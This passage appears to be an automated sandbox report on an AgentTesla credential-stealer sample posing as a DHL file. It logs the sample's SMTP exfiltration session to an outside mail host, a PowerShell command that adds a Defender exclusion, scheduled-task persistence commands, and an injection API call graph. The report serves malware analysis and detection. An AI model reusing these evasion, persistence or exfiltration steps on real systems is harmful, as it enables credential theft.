                                              Apr 24, 2024 07:15:34.251960993 CEST5874974350.87.253.239192.168.2.4235 Authentication succeeded
                                              Apr 24, 2024 07:15:34.252203941 CEST49743587192.168.2.450.87.253.239MAIL FROM:<gm@clslk.com>
                                              Apr 24, 2024 07:15:34.433307886 CEST5874974350.87.253.239192.168.2.4250 OK
                                              Apr 24, 2024 07:15:34.433759928 CEST49743587192.168.2.450.87.253.239RCPT TO:<devendra@syncro-group.xyz>
                                              Apr 24, 2024 07:15:34.689373970 CEST5874974350.87.253.239192.168.2.4250 Accepted
                                              Apr 24, 2024 07:15:34.689536095 CEST49743587192.168.2.450.87.253.239DATA
                                              Apr 24, 2024 07:15:34.870702982 CEST5874974350.87.253.239192.168.2.4354 Enter message, ending with "." on a line by itself
                                              Apr 24, 2024 07:15:34.872208118 CEST49743587192.168.2.450.87.253.239.
                                              Apr 24, 2024 07:15:35.054368973 CEST5874974350.87.253.239192.168.2.4250 OK id=1rzUyk-002y1X-2W
                                              Apr 24, 2024 07:16:53.131306887 CEST49733587192.168.2.450.87.253.239QUIT
                                              Apr 24, 2024 07:16:53.512456894 CEST5874973350.87.253.239192.168.2.4221 box2224.bluehost.com closing connection
                                              Apr 24, 2024 07:16:56.215698004 CEST49736587192.168.2.450.87.253.239QUIT
                                              Apr 24, 2024 07:16:56.595748901 CEST5874973650.87.253.239192.168.2.4221 box2224.bluehost.com closing connection
                                              Apr 24, 2024 07:17:13.308809042 CEST49743587192.168.2.450.87.253.239QUIT
                                              Apr 24, 2024 07:17:13.691904068 CEST5874974350.87.253.239192.168.2.4221 box2224.bluehost.com closing connection

                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:07:15:08
                                              Start date:24/04/2024
                                              Path:C:\Users\user\Desktop\DHL_1003671162.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\DHL_1003671162.exe"
                                              Imagebase:0x540000
                                              File size:840'704 bytes
                                              MD5 hash:1D584D84D4965E7A0DA615B32AB85F2E
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1693256058.0000000003A08000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1693256058.0000000003A08000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:2
                                              Start time:07:15:10
                                              Start date:24/04/2024
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\qmUxKv.exe"
                                              Imagebase:0x200000
                                              File size:433'152 bytes
                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:3
                                              Start time:07:15:10
                                              Start date:24/04/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:4
                                              Start time:07:15:10
                                              Start date:24/04/2024
                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qmUxKv" /XML "C:\Users\user\AppData\Local\Temp\tmp3999.tmp"
                                              Imagebase:0x80000
                                              File size:187'904 bytes
                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:5
                                              Start time:07:15:10
                                              Start date:24/04/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:6
                                              Start time:07:15:10
                                              Start date:24/04/2024
                                              Path:C:\Users\user\Desktop\DHL_1003671162.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\DHL_1003671162.exe"
                                              Imagebase:0xb20000
                                              File size:840'704 bytes
                                              MD5 hash:1D584D84D4965E7A0DA615B32AB85F2E
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2933834693.0000000002F32000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2933834693.0000000002EEC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2933834693.0000000002EEC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2933834693.0000000002F3A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:false

                                              General

                                              Target ID:7
                                              Start time:07:15:12
                                              Start date:24/04/2024
                                              Path:C:\Users\user\AppData\Roaming\qmUxKv.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Roaming\qmUxKv.exe
                                              Imagebase:0x7f0000
                                              File size:840'704 bytes
                                              MD5 hash:1D584D84D4965E7A0DA615B32AB85F2E
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.1732952396.000000000486F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.1732952396.000000000486F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 63%, ReversingLabs
                                              • Detection: 58%, Virustotal, Browse
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:8
                                              Start time:07:15:12
                                              Start date:24/04/2024
                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                              Imagebase:0xa0000
                                              File size:496'640 bytes
                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                              Has elevated privileges:true
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:9
                                              Start time:07:15:14
                                              Start date:24/04/2024
                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qmUxKv" /XML "C:\Users\user\AppData\Local\Temp\tmp46C8.tmp"
                                              Imagebase:0x80000
                                              File size:187'904 bytes
                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:10
                                              Start time:07:15:14
                                              Start date:24/04/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:11
                                              Start time:07:15:14
                                              Start date:24/04/2024
                                              Path:C:\Users\user\AppData\Roaming\qmUxKv.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Roaming\qmUxKv.exe"
                                              Imagebase:0xb40000
                                              File size:840'704 bytes
                                              MD5 hash:1D584D84D4965E7A0DA615B32AB85F2E
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2933168050.0000000002F64000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2933168050.0000000002F6C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2933168050.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2933168050.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:false

                                              General

                                              Target ID:12
                                              Start time:07:15:22
                                              Start date:24/04/2024
                                              Path:C:\Users\user\AppData\Roaming\boqXv\boqXv.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Roaming\boqXv\boqXv.exe"
                                              Imagebase:0xfd0000
                                              File size:840'704 bytes
                                              MD5 hash:1D584D84D4965E7A0DA615B32AB85F2E
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 63%, ReversingLabs
                                              • Detection: 58%, Virustotal, Browse
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:13
                                              Start time:07:15:25
                                              Start date:24/04/2024
                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qmUxKv" /XML "C:\Users\user\AppData\Local\Temp\tmp6C70.tmp"
                                              Imagebase:0x80000
                                              File size:187'904 bytes
                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:15
                                              Start time:07:15:25
                                              Start date:24/04/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:16
                                              Start time:07:15:25
                                              Start date:24/04/2024
                                              Path:C:\Users\user\AppData\Roaming\boqXv\boqXv.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Roaming\boqXv\boqXv.exe"
                                              Imagebase:0xf10000
                                              File size:840'704 bytes
                                              MD5 hash:1D584D84D4965E7A0DA615B32AB85F2E
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.1903974100.0000000003302000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.1903974100.000000000330A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.1894023046.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.1894023046.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.1903974100.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.1903974100.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:17
                                              Start time:07:15:30
                                              Start date:24/04/2024
                                              Path:C:\Users\user\AppData\Roaming\boqXv\boqXv.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Roaming\boqXv\boqXv.exe"
                                              Imagebase:0x250000
                                              File size:840'704 bytes
                                              MD5 hash:1D584D84D4965E7A0DA615B32AB85F2E
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:18
                                              Start time:07:15:31
                                              Start date:24/04/2024
                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qmUxKv" /XML "C:\Users\user\AppData\Local\Temp\tmp8A0A.tmp"
                                              Imagebase:0x80000
                                              File size:187'904 bytes
                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:19
                                              Start time:07:15:31
                                              Start date:24/04/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:20
                                              Start time:07:15:31
                                              Start date:24/04/2024
                                              Path:C:\Users\user\AppData\Roaming\boqXv\boqXv.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Roaming\boqXv\boqXv.exe"
                                              Imagebase:0xf50000
                                              File size:840'704 bytes
                                              MD5 hash:1D584D84D4965E7A0DA615B32AB85F2E
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000014.00000002.2933907510.00000000033C2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000014.00000002.2933907510.00000000033CA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.2933907510.000000000337C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000014.00000002.2933907510.000000000337C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:false

                                              General

                                              Target ID:22
                                              Start time:07:15:32
                                              Start date:24/04/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Disassembly

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:10.6%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:1.4%
                                                Total number of Nodes:219
                                                Total number of Limit Nodes:19
                                                execution_graph 30211 ae8bc58 30212 ae8bde3 30211->30212 30214 ae8bc7e 30211->30214 30214->30212 30215 ae87cd0 30214->30215 30216 ae8bed8 PostMessageW 30215->30216 30217 ae8bf44 30216->30217 30217->30214 29931 289d098 29932 289d0de GetCurrentProcess 29931->29932 29934 289d130 GetCurrentThread 29932->29934 29938 289d129 29932->29938 29935 289d16d GetCurrentProcess 29934->29935 29936 289d166 29934->29936 29937 289d1a3 29935->29937 29936->29935 29939 289d1cb GetCurrentThreadId 29937->29939 29938->29934 29940 289d1fc 29939->29940 30111 2894668 30112 2894672 30111->30112 30116 2894759 30111->30116 30121 2893e28 30112->30121 30114 289468d 30117 289477d 30116->30117 30125 2894858 30117->30125 30129 2894868 30117->30129 30122 2893e33 30121->30122 30137 2895c54 30122->30137 30124 2896fb5 30124->30114 30127 2894868 30125->30127 30126 289496c 30126->30126 30127->30126 30133 28944b0 30127->30133 30131 289488f 30129->30131 30130 289496c 30130->30130 30131->30130 30132 28944b0 CreateActCtxA 30131->30132 30132->30130 30134 28958f8 CreateActCtxA 30133->30134 30136 28959bb 30134->30136 30136->30136 30138 2895c5f 30137->30138 30141 2895ca4 30138->30141 30140 2897055 30140->30124 30142 2895caf 30141->30142 30145 2895cd4 30142->30145 30144 289713a 30144->30140 30146 2895cdf 30145->30146 30149 2895d04 30146->30149 30148 289722d 30148->30144 30150 2895d0f 30149->30150 30152 289852b 30150->30152 30155 289abd0 30150->30155 30151 2898569 30151->30148 30152->30151 30159 289cca0 30152->30159 30164 289abf8 30155->30164 30168 289ac08 30155->30168 30156 289abe6 30156->30152 30160 289ccd1 30159->30160 30161 289ccf5 30160->30161 30191 289cf80 30160->30191 30195 289cf70 30160->30195 30161->30151 30165 289ac08 30164->30165 30171 289ad00 30165->30171 30166 289ac17 30166->30156 30170 289ad00 2 API calls 30168->30170 30169 289ac17 30169->30156 30170->30169 30172 289ad11 30171->30172 30173 289ad34 30171->30173 30172->30173 30179 289b388 30172->30179 30183 289b398 30172->30183 30173->30166 30174 289ad2c 30174->30173 30175 289af38 GetModuleHandleW 30174->30175 30176 289af65 30175->30176 30176->30166 30180 289b3ac 30179->30180 30181 289b3d1 30180->30181 30187 289af88 30180->30187 30181->30174 30184 289b3ac 30183->30184 30185 289b3d1 30184->30185 30186 289af88 LoadLibraryExW 30184->30186 30185->30174 30186->30185 30188 289b558 LoadLibraryExW 30187->30188 30190 289b5d1 30188->30190 30190->30181 30193 289cf8d 30191->30193 30192 289cfc7 30192->30161 30193->30192 30199 289b288 30193->30199 30197 289cf8d 30195->30197 30196 289cfc7 30196->30161 30197->30196 30198 289b288 2 API calls 30197->30198 30198->30196 30200 289b293 30199->30200 30202 289dce0 30200->30202 30203 289b36c 30200->30203 30202->30202 30204 289b377 30203->30204 30205 2895d04 2 API calls 30204->30205 30206 289dd4f 30204->30206 30205->30206 30206->30202 30207 289d3a1 30208 289d367 DuplicateHandle 30207->30208 30210 289d3aa 30207->30210 30209 289d376 30208->30209 29941 ae884b5 29945 ae8aa78 29941->29945 29963 ae8aa72 29941->29963 29942 ae884c4 29946 ae8aa92 29945->29946 29981 ae8b564 29946->29981 29986 ae8b740 29946->29986 29992 ae8b6ee 29946->29992 29997 ae8b1ec 29946->29997 30002 ae8afeb 29946->30002 30007 ae8ad94 29946->30007 30013 ae8b034 29946->30013 30018 ae8b5d1 29946->30018 30026 ae8b13e 29946->30026 30033 ae8b93c 29946->30033 30037 ae8b0bb 29946->30037 30042 ae8af59 29946->30042 30048 ae8b1d9 29946->30048 30053 ae8b0f9 29946->30053 30057 ae8b419 29946->30057 29947 ae8aab6 29947->29942 29964 ae8aa78 29963->29964 29966 ae8afeb 2 API calls 29964->29966 29967 ae8b1ec 2 API calls 29964->29967 29968 ae8b6ee 2 API calls 29964->29968 29969 ae8b740 2 API calls 29964->29969 29970 ae8b564 2 API calls 29964->29970 29971 ae8b419 2 API calls 29964->29971 29972 ae8b0f9 2 API calls 29964->29972 29973 ae8b1d9 2 API calls 29964->29973 29974 ae8af59 2 API calls 29964->29974 29975 ae8b0bb 2 API calls 29964->29975 29976 ae8b93c 2 API calls 29964->29976 29977 ae8b13e 4 API calls 29964->29977 29978 ae8b5d1 2 API calls 29964->29978 29979 ae8b034 2 API calls 29964->29979 29980 ae8ad94 2 API calls 29964->29980 29965 ae8aab6 29965->29942 29966->29965 29967->29965 29968->29965 29969->29965 29970->29965 29971->29965 29972->29965 29973->29965 29974->29965 29975->29965 29976->29965 29977->29965 29978->29965 29979->29965 29980->29965 29982 ae8b56a 29981->29982 30063 ae8799a 29982->30063 30067 ae879a0 29982->30067 29983 ae8b087 29987 ae8b57b 29986->29987 29988 ae8b91d 29987->29988 29990 ae8799a WriteProcessMemory 29987->29990 29991 ae879a0 WriteProcessMemory 29987->29991 29988->29947 29989 ae8b087 29990->29989 29991->29989 29993 ae8b6f1 29992->29993 29994 ae8b6a6 29992->29994 29993->29947 29994->29992 30071 ae878da 29994->30071 30075 ae878e0 29994->30075 29998 ae8b20f 29997->29998 30000 ae8799a WriteProcessMemory 29998->30000 30001 ae879a0 WriteProcessMemory 29998->30001 29999 ae8b46d 29999->29947 30000->29999 30001->29999 30003 ae8b0bc 30002->30003 30079 ae87808 30003->30079 30083 ae87800 30003->30083 30004 ae8b02d 30004->29947 30009 ae8add3 30007->30009 30008 ae8ae92 30008->29947 30009->30008 30087 ae88028 30009->30087 30091 ae8801d 30009->30091 30014 ae8b03a 30013->30014 30015 ae8b5cb 30014->30015 30095 ae8731a 30014->30095 30099 ae87320 30014->30099 30019 ae8b69a 30018->30019 30021 ae8b6a6 30019->30021 30022 ae878da VirtualAllocEx 30019->30022 30023 ae878e0 VirtualAllocEx 30019->30023 30020 ae8b6f1 30020->29947 30021->30020 30024 ae878da VirtualAllocEx 30021->30024 30025 ae878e0 VirtualAllocEx 30021->30025 30022->30021 30023->30021 30024->30021 30025->30021 30031 ae87808 Wow64SetThreadContext 30026->30031 30032 ae87800 Wow64SetThreadContext 30026->30032 30027 ae8b5cb 30028 ae8b04b 30028->30027 30029 ae8731a ResumeThread 30028->30029 30030 ae87320 ResumeThread 30028->30030 30029->30028 30030->30028 30031->30028 30032->30028 30035 ae8799a WriteProcessMemory 30033->30035 30036 ae879a0 WriteProcessMemory 30033->30036 30034 ae8b963 30035->30034 30036->30034 30038 ae8b0bc 30037->30038 30040 ae87808 Wow64SetThreadContext 30038->30040 30041 ae87800 Wow64SetThreadContext 30038->30041 30039 ae8b02d 30039->29947 30040->30039 30041->30039 30043 ae8ae92 30042->30043 30044 ae8ae32 30042->30044 30043->29947 30044->30043 30046 ae88028 CreateProcessA 30044->30046 30047 ae8801d CreateProcessA 30044->30047 30045 ae8afa0 30045->29947 30046->30045 30047->30045 30049 ae8b04b 30048->30049 30050 ae8b5cb 30049->30050 30051 ae8731a ResumeThread 30049->30051 30052 ae87320 ResumeThread 30049->30052 30051->30049 30052->30049 30103 ae87a88 30053->30103 30107 ae87a90 30053->30107 30054 ae8afc8 30054->29947 30058 ae8b453 30057->30058 30060 ae8afc8 30057->30060 30061 ae8799a WriteProcessMemory 30058->30061 30062 ae879a0 WriteProcessMemory 30058->30062 30059 ae8b46d 30059->29947 30060->29947 30061->30059 30062->30059 30064 ae879e8 WriteProcessMemory 30063->30064 30066 ae87a3f 30064->30066 30066->29983 30068 ae879e8 WriteProcessMemory 30067->30068 30070 ae87a3f 30068->30070 30070->29983 30072 ae87920 VirtualAllocEx 30071->30072 30074 ae8795d 30072->30074 30074->29994 30076 ae87920 VirtualAllocEx 30075->30076 30078 ae8795d 30076->30078 30078->29994 30080 ae8784d Wow64SetThreadContext 30079->30080 30082 ae87895 30080->30082 30082->30004 30084 ae8784d Wow64SetThreadContext 30083->30084 30086 ae87895 30084->30086 30086->30004 30088 ae880b1 CreateProcessA 30087->30088 30090 ae88273 30088->30090 30092 ae88028 CreateProcessA 30091->30092 30094 ae88273 30092->30094 30096 ae87360 ResumeThread 30095->30096 30098 ae87391 30096->30098 30098->30014 30100 ae87360 ResumeThread 30099->30100 30102 ae87391 30100->30102 30102->30014 30104 ae87adb ReadProcessMemory 30103->30104 30106 ae87b1f 30104->30106 30106->30054 30108 ae87adb ReadProcessMemory 30107->30108 30110 ae87b1f 30108->30110 30110->30054

                                                Executed Functions

                                                Function 071B4560 Relevance: 4.0, Strings: 3, Instructions: 286COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 847 71b4560-71b4570 848 71b4572-71b458c 847->848 849 71b45b1-71b45cd 847->849 850 71b458e-71b45a4 848->850 851 71b45d2-71b45e0 848->851 852 71b45ce-71b45d0 849->852 853 71b45e3-71b45e8 850->853 854 71b45a6-71b45b0 850->854 851->853 852->851 853->852 855 71b45ea-71b45f1 853->855 854->849 856 71b465e-71b4698 855->856 857 71b45f3-71b461b 855->857 865 71b469b 856->865 859 71b461d 857->859 860 71b4622-71b465a 857->860 859->860 860->856 866 71b46a2-71b46be 865->866 867 71b46c0 866->867 868 71b46c7-71b46c8 866->868 867->865 869 71b47fa-71b4811 867->869 870 71b47d9-71b47f5 867->870 871 71b4728-71b472c 867->871 872 71b4758-71b476a 867->872 873 71b476f-71b4799 867->873 874 71b479e-71b47d4 867->874 875 71b46cd-71b46e2 867->875 876 71b4816-71b4886 867->876 877 71b46e4-71b4700 867->877 868->875 868->876 869->866 870->866 878 71b473f-71b4746 871->878 879 71b472e-71b473d 871->879 872->866 873->866 874->866 875->866 891 71b4888 call 71b58d8 876->891 892 71b4888 call 71b5e6c 876->892 893 71b4888 call 71b6526 876->893 894 71b4888 call 71b5ee4 876->894 886 71b4708-71b4723 877->886 883 71b474d-71b4753 878->883 879->883 883->866 886->866 890 71b488e-71b4898 891->890 892->890 893->890 894->890
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Te^q$Te^q$)"
                                                • API String ID: 0-4031938444
                                                • Opcode ID: 55e5651a9712c910066481af3a2ae507388f401bbdc694514e149a679884474a
                                                • Instruction ID: 54af403c62b6fd083fcc1fe381e9fb7121caa970d92b1a4984b5aebdd955e1d9
                                                • Opcode Fuzzy Hash: 55e5651a9712c910066481af3a2ae507388f401bbdc694514e149a679884474a
                                                • Instruction Fuzzy Hash: E4B139B4E102598FCB08CFA9D480ADDFBB2FF89310F24852AD855AB295D734A946CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071B45F8 Relevance: 4.0, Strings: 3, Instructions: 201COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 895 71b45f8-71b461b 896 71b461d 895->896 897 71b4622-71b4698 895->897 896->897 903 71b469b 897->903 904 71b46a2-71b46be 903->904 905 71b46c0 904->905 906 71b46c7-71b46c8 904->906 905->903 907 71b47fa-71b4811 905->907 908 71b47d9-71b47f5 905->908 909 71b4728-71b472c 905->909 910 71b4758-71b476a 905->910 911 71b476f-71b4799 905->911 912 71b479e-71b47d4 905->912 913 71b46cd-71b46e2 905->913 914 71b4816-71b4886 905->914 915 71b46e4-71b4700 905->915 906->913 906->914 907->904 908->904 916 71b473f-71b4746 909->916 917 71b472e-71b473d 909->917 910->904 911->904 912->904 913->904 929 71b4888 call 71b58d8 914->929 930 71b4888 call 71b5e6c 914->930 931 71b4888 call 71b6526 914->931 932 71b4888 call 71b5ee4 914->932 924 71b4708-71b4723 915->924 921 71b474d-71b4753 916->921 917->921 921->904 924->904 928 71b488e-71b4898 929->928 930->928 931->928 932->928
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Te^q$Te^q$)"
                                                • API String ID: 0-4031938444
                                                • Opcode ID: 9f0aa10f3f11bb08ec4d35de136dc2574c25c6955082b42ad27443f059233201
                                                • Instruction ID: 18d3ec0d43a2e86d7b795bafbb4852992df1171851342cdf1f1f40f85bbb7b6c
